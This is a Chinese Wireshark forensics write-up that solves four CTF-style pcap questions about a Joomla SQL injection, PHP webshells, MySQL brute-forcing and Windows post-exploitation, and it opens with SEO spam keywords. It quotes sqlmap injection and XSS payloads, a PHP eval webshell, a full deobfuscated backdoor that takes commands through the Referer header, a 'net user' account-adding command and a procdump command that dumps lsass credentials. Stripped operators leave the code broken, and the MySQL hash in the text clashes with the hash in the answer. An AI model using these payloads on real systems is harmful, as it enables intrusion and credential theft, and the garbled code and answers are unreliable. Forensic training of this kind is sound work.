seo优化网站,如何在网上卖货,烟台高端品牌网站建设,济南快速排名目录
前言
一、题目一(1.pcap)
二、题目二(2.pcap)
三、题目三(3.pcap)
四、题目四(4.pcap) 前言
Wireshark流量包分析对于安全来说是很重要的#xff0c;我们可以通过Wireshark来诊断网络问题#xff0c;检测网络攻击、监控网络流量以及捕获恶意软件等等
接下来我们…目录
前言
一、题目一(1.pcap)
二、题目二(2.pcap)
三、题目三(3.pcap)
四、题目四(4.pcap) 前言
Wireshark流量包分析对于安全来说是很重要的我们可以通过Wireshark来诊断网络问题检测网络攻击、监控网络流量以及捕获恶意软件等等
接下来我们来看一道数据分析题需要4个流量包 1-4.pcap网盘链接自行提取
链接百度网盘 请输入提取码 提取码hrc4
一、题目一(1.pcap)
题目要求
1.黑客攻击的第一个受害主机的网卡IP地址
2.黑客对URL的哪一个参数实施了SQL注入
3.第一个受害主机网站数据库的表前缀加上下划线例如abc
4.第一个受害主机网站数据库的名字 看到题目SQL注入那就首先过滤http和https协议
过滤后可以看到两个出现次数比较多的ip202.1.1.2和192.168.1.8可以看到202.1.1.2对192.168.1.8进行了攻击 这里第一个问题的答案就出来了受害主机网卡IP是192.168.1.8 202.1.1.2为攻击者IP
然后直接看源IP为202.1.1.2的http请求包
这里随便先看一个包urlcode解码后如下
可以看到黑客使用了SQL注入试图构造存储型xss
optioncom_contenthistoryviewhistorylist[ordering]item_id1type_id1list[select](XfqR2916 AND 11 UNION ALL SELECT 1,NULL,scriptalert(XSS)/script,tab
再看一个包同样urlcode解码
分析后发现仍在尝试SQL注入注入工具sqlmap注入点为list[select]
optioncom_contenthistoryviewhistorylist[ordering]item_id1type_id1list[select]( OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71717a7671,(SELECT (ELT(883
然后我们去追踪一个SQL注入的TCP流
可以看到数据库为MariaDB已经报错而且表前缀为ajtuc_ 要找到数据库名的话我们最好去最后那几条去找看到url中如果包含schema关键字那大概率就是数据库名 这里的数据库名使用十六进制解码解码出来就是joomla
答案
1.黑客攻击的第一个受害主机的网卡IP地址 192.168.1.8 2.黑客对URL的哪一个参数实施了SQL注入 list[select] 3.第一个受害主机网站数据库的表前缀(加上下划线例如abc_) ajtuc_ 4.第一个受害主机网站数据库的名字 joomla
二、题目二(2.pcap)
打开2.pcap
题目要求
1.黑客第一次获得的php木马的密码是什么
2.黑客第二次上传php木马是什么时间
3.第二次上传的木马通过HTTP协议中的哪个头传递数据 题目要求php木马的密码首先我们要知道php一句话木马一般都是POST请求
所以我们直接过滤POST请求发现这个IP请求了一个名为kkkaaa.php的php文件很可疑
正常文件不会以此命名的 打开数据包看一下发现了这个字段
Form item: zzz eval(base64_decode($_POST[z0]));
其实一句话木马密码已经出来了就是zzz 这里他上传的一句话木马应该是
?php eval($_POST[zzz]);?
然后又将eval(base64_decode($_POST[z0]));传入zzz参数目的是将z0传入的数据进行base64的解码
此时z0传入base64编码后的数据便可以执行恶意代码
解码后发现执行了dirname函数目的是查看当前路径下的文件或目录类似linux下的ls命令 第二题是第二次上传木马的时间
没有头绪的话来分析下过滤出来的这几个包其他参数都一样重要的是Length这个字段 第一个包毋庸置疑是会比其他包长一点但是第四个包很奇怪和其他包相比长了150多字节左右
追踪tcp流 可以明显看到z2很不正常其他参数都是urlcode和base64编码
z2使用十六进制编码我们来解码看一下
这样的PHP代码是通过混淆过的让我们根本看不懂他的代码 经过还原后的代码
?php
$kh cb42;
$kf e130;
function x($t, $k)
{$c strlen($k);$l strlen($t);$o ;for ($i 0; $i $l;) {for ($j 0; ($j $c $i $l); $j, $i) {$o . $t{$i} ^ $k{$j};}}return $o;
}$r $_SERVER;
$rr $r[HTTP_REFERER];
$ra $r[HTTP_ACCEPT_LANGUAGE];
if ($rr $ra) {$u parse_url($rr);parse_str($u[query], $q);$q array_values($q);preg_match_all(/([\w])[\w-](?:;q0.([\d]))?,?/, $ra, $m);if ($q $m) {session_start();$s $_SESSION;$ss substr;$sl strtolower;$i $m[1][0] . $m[1][4];$h $sl($ss(md5($i . $kh), 0, 3));$f $sl($ss(md5($i . $kf), 0, 3));$p ;for ($z 1; $z count($m[1]); $z) $p . $q[$m[2][$z]];if (strpos($p, $h) 0) {$s[$i] ;$p $ss($p, 3);}if (array_key_exists($i, $s)) {$s[$i] . $p;$e strpos($s[$i], $f);if ($e) {$k $kh . $kf;ob_start();eval(gzuncompress(x(base64_decode(preg_replace(array(/_/, /-/), array(/, ), $ss($s[$i], 0, $e))), $k)));$o ob_get_contents();ob_end_clean();$d base64_encode(x(gzcompress($o), $k));print($k$d/$k);session_destroy();}}}
}
?
检查后发现create_function函数这个函数是可以执行命令的
官方也提示这个函数在8.0已经被移除并且和eval()函数有同样的安全隐患
说明黑客是利用了create_function函数来上传了自己的木马
时间的话ctrlf选择分组详情选择字符串搜索time字符串时间就出来了
Feb 7, 2018 17:20:44.248365000 中国标准时间 然后我们来分析一下这个木马
木马要利用就必然会与数据包进行交互仔细看看这两行代码
$rr $r[HTTP_REFERER];
$ra $r[HTTP_ACCEPT_LANGUAGE];
这两行代码是获取http请求中的referer和accept_language字段的与数据包产生了交互
所以可以基本断定这两个字段是黑客用来传输他想执行的命令的
我们随便看一个访问footer.php的包
发现Referer字段长度很不正常Accept-Language字段正常 所以可以基本确定木马通过HTTP协议中的referer头传递数据
答案
1.黑客第一次获得的php木马的密码是什么 zzz 2.黑客第二次上传php木马是什么时间 17:20:44.248365 3.第二次上传的木马通过HTTP协议中的哪个头传递数据 Referer
三、题目三(3.pcap)
打开3.pcap
题目要求
1.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)
2.php代理第一次被使用时最先连接了哪个IP地址 题目要求mysql的数据直接过滤tcp contains mysql mysql
发现黑客一直在爆破MySQL密码 我们找到最后一条可能是爆破成功的密码
用户admin
密码Hash4858e7dcb0968daa7b599be4b0edb88a25ad89ac
然后过滤http请求发现名为tunnel.php的php文件 点开可以清晰地看到php代理第一次连接的IP地址是4.2.2.2端口53 答案
1.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash) admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4 2.php代理第一次被使用时最先连接了哪个IP地址 4.2.2.2
四、题目四(4.pcap)
打开4.pcap
题目要求
1.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候
2.黑客在内网主机中添加的用户名和密码是多少
3.黑客从内网服务器中下载下来的文件名 获取当前目录的文件列表的命令Windows中是dirlinux中是ls
直接过滤
(ip.addr 192.168.1.8 || ip.addr 202.1.1.2) (http contains dir || http contains ls) 发现有ls也有dir
追踪tcp流发现第一次的ls没有执行成功因为没有服务器回显
第二次的dir执行成功了 搜索时间
Feb 7, 2018 18:36:59.770782000 中国标准时间
在Windows下添加用户必然要使用net user管理员用户回显Administrator所以我们直接过滤
(ip.addr 192.168.1.8 || ip.addr 202.1.1.2) (http contains user || http contains Administrator)
这里看到是没有任何用户的时间Feb 7, 2018 18:49:27.767754000 中国标准时间 再往后面看发现已经添加了管理员用户kaka时间
Feb 7, 2018 18:50:42.908737000 中国标准时间 那么黑客必然是在这个时间段执行了添加用户的命令
然后我们就来看这期间的http请求直接通过时间过滤
(ip.addr 192.168.1.8 || ip.addr 202.1.1.2) http frame.time_relative 827.109385 frame.time_relative 902.267039 最终我们发现这个不寻常的请求
通过base64解码发现
cd/dC:\phpStudy\WWW\b2evolution\install\test\net user kaka kaka /addecho [S]cdecho [E]
用户名和密码分别为 kaka:kaka
最后一题是下载一句话木马是POST请求而且攻击的IP地址为192.168.2.20那就直接过滤
ip.dst 192.168.2.20 http.request.method POST
筛出来之后没办法只有一个个看base64解码 然后在最后发现了这个包 解码后
cd/dC:\phpStudy\WWW\b2evolution\install\test\procdump.exe -accepteula -ma lspasss.dmpecho [S]cdecho [E]
发现使用了procdump.exe
往后看发现了这个包 解码出来是这样的
C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp
最后我们可以确定黑客下载了lsass.exe_180208_185247.dmp文件
答案
1.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候 Feb 7, 2018 18:36:59.770782000 2.黑客在内网主机中添加的用户名和密码是多少 kaka:kaka 3.黑客从内网服务器中下载下来的文件名 lsass.exe_180208_185247.dmp